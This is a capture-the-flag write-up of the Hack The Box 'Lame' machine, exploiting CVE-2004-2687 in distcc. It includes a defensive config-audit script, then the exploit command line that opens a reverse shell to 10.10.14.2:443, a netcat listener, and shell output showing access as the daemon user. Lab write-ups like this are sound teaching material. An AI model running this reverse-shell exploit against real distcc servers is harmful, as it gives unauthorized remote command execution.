CVE-2004-2687


A vulnerability classified as very critical was found in Apple Xcode 1.5 (Programming Tool Software). An unknown part of the Authorization component is affected. Manipulation with an unknown input leads to a configuration vulnerability, declared under CWE-16. Confidentiality, integrity, and availability are impacted.
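The CWE-16 point above is that distccd compiles, and therefore executes, whatever a reachable client submits unless the daemon is started with client restrictions. The audit below is an added example, not code from the original write-up: it assumes a Debian-style /etc/default/distcc (STARTDISTCC, ALLOWEDNETS, LISTENER) and distccd's --allow / --listen options, and the sample config bodies are constructed.

```python
"""Audit distccd exposure.  The weakness behind CVE-2004-2687 is a daemon on
port 3632 that compiles, and so executes, jobs from any client (CWE-16); the
check is whether --allow / ALLOWEDNETS really limits client networks.
Added example, not from the write-up; the sample config below is constructed."""
import ipaddress
import shlex

WEAK_CONF = 'STARTDISTCC="true"\nALLOWEDNETS="0.0.0.0/0"\nLISTENER=""\n'
HARDENED_CONF = 'STARTDISTCC="true"\nALLOWEDNETS="10.10.10.0/24"\nLISTENER="10.10.10.3"\n'

def parse_default_distcc(text: str) -> dict:
    """Parse KEY="value" lines of a Debian-style /etc/default/distcc."""
    conf = {}
    for line in text.splitlines():
        key, sep, val = line.strip().partition("=")
        if sep and key.isupper():  # skips comments and blank lines
            conf[key] = val.strip().strip('"\'')
    return conf

def cmdline_options(cmdline: str) -> tuple[list[str], str]:
    """Return (allow networks, listen address) from a distccd command line."""
    args = shlex.split(cmdline)
    allow, listen = [], ""
    for i, arg in enumerate(args[:-1]):
        if arg == "--allow":
            allow.append(args[i + 1])
        elif arg == "--listen":
            listen = args[i + 1]
    return allow, listen

def findings(allow: list[str], listen: str) -> list[str]:
    """Empty list means clients and the bind address are both restricted."""
    out, wildcard = [], not allow
    for net in allow:
        try:  # a /0 entry "restricts" access to every address there is
            wildcard |= ipaddress.ip_network(net, strict=False).prefixlen == 0
        except ValueError:
            pass  # distccd rejects malformed entries, so not a wildcard
    if wildcard:
        out.append("no effective client restriction (--allow / ALLOWEDNETS)")
    if listen in ("", "0.0.0.0", "::"):
        out.append("daemon binds every interface (--listen / LISTENER)")
    return out

def audit_config(text: str) -> list[str]:
    conf = parse_default_distcc(text)
    if conf.get("STARTDISTCC", "false").lower() != "true":
        return []  # daemon disabled: nothing is listening
    return findings(conf.get("ALLOWEDNETS", "").split(), conf.get("LISTENER", ""))
```

Run `audit_config` over the host's /etc/default/distcc, or feed `ps` output for a running distccd through `cmdline_options` and `findings`; two findings mean the daemon is in the same state the write-up exploits.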

Exploit


I found an exploit online.

Exploitation


┌──(kali㉿kali)-[~/archive/htb/labs/lame]
└─$ python3 CVE-2004-2687.py --rhost $IP --rport 3632 --lhost 10.10.14.2 --lport 443
[+] payload: Payload generated!
[+] execution: DistCC Daemon exploited with success!
[+] opening connection to 10.10.10.3 on port 3632: Done
[◐] trying to bind to :: on port 443: Trying ::
Traceback (most recent call last):
  File "/home/kali/archive/htb/labs/lame/CVE-2004-2687.py", line 120, in <module>
    shell = listen(lport, timeout=20).wait_for_connection()
  File "/home/kali/.local/lib/python3.10/site-packages/pwnlib/tubes/listen.py", line 103, in __init__
    listen_sock.bind(self.sockaddr)
OSError: [Errno 98] Address already in use
[*] Closed connection to 10.10.10.3 port 3632

Launching the exploit

┌──(kali㉿kali)-[~/archive/htb/labs/lame]
└─$ nnc 443
listening on [any] 443 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.3] 47188
whoami
daemon
hostname
lame
ifconfig
eth0      Link encap:Ethernet  HWaddr 00:50:56:b9:b0:52
          inet addr:10.10.10.3  Bcast:10.10.10.255  Mask:255.255.255.0
          inet6 addr: dead:beef::250:56ff:feb9:b052/64 Scope:Global
          inet6 addr: fe80::250:56ff:feb9:b052/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:356865 errors:0 dropped:0 overruns:0 frame:0
          TX packets:2882 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:26621350 (25.3 MB)  TX bytes:432817 (422.6 KB)
          Interrupt:19 Base address:0x2024

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:364 errors:0 dropped:0 overruns:0 frame:0
          TX packets:364 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:154817 (151.1 KB)  TX bytes:154817 (151.1 KB)

Initial foothold established on the target system as the daemon user by exploiting CVE-2004-2687 on the target's distcc instance.